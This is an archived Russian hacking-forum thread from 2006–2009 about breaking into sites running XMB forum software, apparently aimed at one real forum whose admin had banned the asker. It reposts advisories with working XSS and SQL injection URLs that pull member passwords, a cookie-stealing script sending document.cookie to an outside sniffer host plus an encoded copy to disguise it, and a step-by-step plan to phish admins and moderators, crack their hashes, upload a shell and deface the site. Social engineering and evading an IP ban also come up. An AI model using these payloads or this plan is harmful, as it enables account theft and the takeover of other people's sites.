PDA

Просмотр полной версии : Есть ли уязвимости у Xmb ?


netzzz
12.07.2006, 13:17
Обыскал форум через поиск по запросу Xmb выдал только 1 статью да и то не по уязвимости, неужели у этого форума совсем нет уязвимостей ? на секьюрити лаб все статьи по старым форумам, 1.5, 1.6 1.8
если не увидел чего .. ткните носом

Nova
12.07.2006, 13:19
Форум просто не сильнопопулярный по этому особо нечего и нет....
Я поищу если что найду стоящие то выложу....

Тебя какие версий интересуют ?

j0nathan
14.07.2006, 05:46
Программа: XMB 1.9.3 и более ранние версии
Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует при обработке поля "Your Current Mood" при регистрации учетной записи. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта.

Программа: XMB 1.9.3, возможно более ранние версии
Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения

Программа: XMB Forum 1.9.3 и более ранние версии
Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует при обработке входных данных в параметре username сценария u2u.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[host]/u2u.php?action=send&username=[code]
Программа: XMB Forum 1.8 Partagium Final SP2 (Build: 2003100518)
Опасность: Средняя

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может выполнить SQL команды на основной базе данных и выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript>

http://[target]/xmb18sp2/member.php?action=viewpro&member=x<%73cript>al ert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);
</%73cript>

http://[target]/xmb18sp2/editprofile.php? user=x"><%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/viewthread.php?tid=1&ppp=x<%73cript>alert
(document.cookie);</%73cript>

http://[target] /xmb18sp2/misc.php?action=list&order=postnum&desc=x


http://[target]/xmb18sp2/misc.php?action=list&order=postnum&desc=x<%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/forumdisplay.php?fid=1&tpp=x<%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x<%73cript>ale rt
(document.cookie);</%73cript>

text1 text2


text1 javascript:alert(document.cookie);//gif text2


http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL
SELECT NULL,NULL,username FROM xmb_members WHERE uid=1
LIMIT 1/*

http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT
NULL,NULL,password FROM xmb_members WHERE uid=1
LIMIT 1/*

Программа: XMB Forum 1.8 Partagium SP3; 1.9 Nexus Beta
Опасность: Средняя

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.

Пример/Эксплоит:

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar

http://localhost/xmb19beta/member.php?action=viewpro&m ember=waraxe&restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY %20p.fid%20UNION%20SELECT%20password,null,9

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%2 0SELECT%20username,null,9

http://localhost/xmb19beta/misc.php?action=search&restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/misc.php?act ion=search&restrict=%20private=-99%20UNION%20SELECT%20null,null,password,null,null ,null,null,null,null,null,null,
1%20LIMIT%201%20/*

http://localhost/xmb19beta/today. php?restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body onload=alert(document.cookie);>

http://localhost/xmb19beta/editprofile.php?u ser=notexist_foobar&u2uheader=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/u2u.php?folder=foobar"><body%20onload=alert(document.cookie);>

http ://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/stats.php?action=view&replymost=" ></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body%20onload=alert(document.cookie);>

htt p://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/post.php?action=newthre ad&fid=1&icons=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=<body%20onload=alert(document.cookie);>

http://l ocalhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=<body%20onload= alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdispla y.php?fid=1&forumdisplay=<body%20onload=alert(document.cookie);>

Программа: XMB Forum 1.9.1
Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важной информации пользователей.

Уязвимость существует из-за недостаточной фильтрации данных в параметре Mood и поле Send To. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Это ещё не все :D
http://www.securitylab.ru/vulnerability/page1_670.php?page=1_670&arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%5D=xmb&set_filter=%D4%E8%EB%FC%F2%F0&set_filter=Y


в иксМБ много иксс! Можно спокойно мд5 угнать :)

Dracula4ever
14.07.2006, 07:08
на Xmb есть очень хорошоя SQL-инъекция котороя существует из за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php .

j0nathan
14.07.2006, 08:28
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения


А какой запрос делать чтобы хэш увидеть у первого id ??

netzzz
14.07.2006, 09:40
вот вот я тоже бы хотел это узнать, хотя я в этом сильно сомневаюсь, похожая описанной уязвимости была насколько я помню в phpBB 2.0.6 , не думаю что xmb не исправило эту багу

j0nathan
14.07.2006, 11:43
Возможно нет вслудуйщей мне кажеться залатают дыру

netzzz
14.07.2006, 12:15
да кстати версия которая меня интерисует 1.9.5
а по поводу распространенности, то считаю его зря подзабыли орум классный и по функциональности давно обогнал phpBB в стандартной комплектации

j0nathan
14.07.2006, 13:47
Зарегайся на форуме и проверь xss
http://[адресс форума]/u2u.php?action=send&username=<script>alert('lol')</script>
если алерт пашет то пиши в ПМ админу типа чё за косяк
http://[адресс форума]/u2u.php?action=send&username=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Есть в инете специальные скрипты
но можно немного скрипт сниффа приныкать но можно лучше сныкать
http://[адресс форума]/u2u.php?action=send&username=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+im g.src+%3D+%22http%3A%2F%2Fantichat.ru%2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript %3E
Админ по ссылке зайдёт и ты его хэш забираешь и разшифровываешь :) Кстати ПС
тебе придётся ждать долго чтоб он записал свои данные в лог тебе надо будет ждать и палить лог
http://antichat.ru/sniff/log.php
Но можно на хостинге свой поставить и чтобы он в текстовик их писал так удобней будет :) Вся эта шняга на 1.8 точно пашет ну ещё должна на 1.9.3

netzzz
17.07.2006, 10:32
в этом то вся и проблема, админ не ламер в принципе, рега закрыта и дает регится он только проверенным пользователям, может можно как нибудь шелл залить ?

Brahma
17.07.2006, 18:12
В последних версиях - критических уязвимостей нет, присутствует Xss.

j0nathan
18.07.2006, 02:45
][оть и админ не ламер но он человек с иксСС наеб*ть его можно :)

netzzz
19.07.2006, 15:31
не думаю я что у него пройдет xss но попробовать можно если подскажете какую нить рабочую... те что были описаны ранее не работают

Blackton Dee
28.07.2006, 00:09
Да возьми и поищи сам, они там просто на каждом шагу ! :) Я в одном xmb-форуме, немного измененном админом, нашел xss в поле Location. Это поле показывалось для каждого пользователя, заходящего на главную страницу, т.е., внизу надпись:
Кто сейчас на форуме: Vasia(location), Petia(location) ...
Что было дальше, нетрудно догадаться...

Romaxa55
28.07.2006, 00:36
Дружище... не парься, ксс найдешь, через пм катай этот ксс админу и всем модерам, один модер по любому попадется, а там редкатируй все разделы форума, и вставляй ксс а там админ попадется вот и усе, получил хешь, через онлайн базу мд5 получил пасс и заходи в админку и лей шелл и дефайс его =)

netzzz
28.07.2006, 10:46
проблема в том что через ПМ я ничего послать не могу, т.к. админ разрешает регится только проверенным пользователям, а поскольку он зациклен на безопасности, (мания преследования у него) то это практически не реально, могут ли быть другие способы ?

Brahma
28.07.2006, 13:16
Не мания - а защита от таких как ты)

netzzz
31.07.2006, 11:03
защита от таких как я тут.. а там где закрыта рега , где в чат входишь и тебя банят только из за того что ты из какого то определенного города, то это уже дескриминация по территориальному признаку и мания преследования

Brahma
31.07.2006, 18:41
Если ты не в курсе - любой сайт - это частная вирт. собственность, и тут уже право админа - пускать тебя на свой ресурс, открывать или закрывать регистрацию...etc.
Советую заработать там себе репутацию, втереться в доверие, и хакнуть по полной) Соц. инженерией пользуйся.

netzzz
03.08.2006, 10:00
Ладно допустим это частная собственность и я бы может не принял бы это так близко если перед тем как меня забанили меня не обвинили в том чего я не делал, по сути за это и забанили, за то чего я не делал.. но это так отступление....
вернемся к нашим баранам... если пользоваться СИ и втерется в доверие, для этого нужен доступ, а там я забанен по ай пи, все бы ничего если бы не корпоративный прокси через который идет выход в нет и возможности сменить прокси обычным методом нет... поэтому нужно прибегнуть к соксификации
из этого возник следующий вопрос... на серваке стоит Kerio Winroute Firewall держит ли он что нибудь из (CONNECT, Socks4, Socks5) если да то где можно почитать про настройку, если нет то как можно прикрутить эти вещи к Kerio и можно ли, а если нет то какая есть альтернатива прокси серверу и как его можно настроить (читать : где найти как настроить, поисковики просьба не предлагать, я уже облазил что можно ничего толкового не нашел, или просто не знал что искать)

Велемир
04.06.2009, 18:43
Чёт я ни хрена не догнал,где там ошибка в обработке кук в today.php.Или в версиях 1.9.1 и 1.9.2 их нет?

mr.gr33n
22.07.2009, 01:46
А как залить шелл в XMB, подскажите =)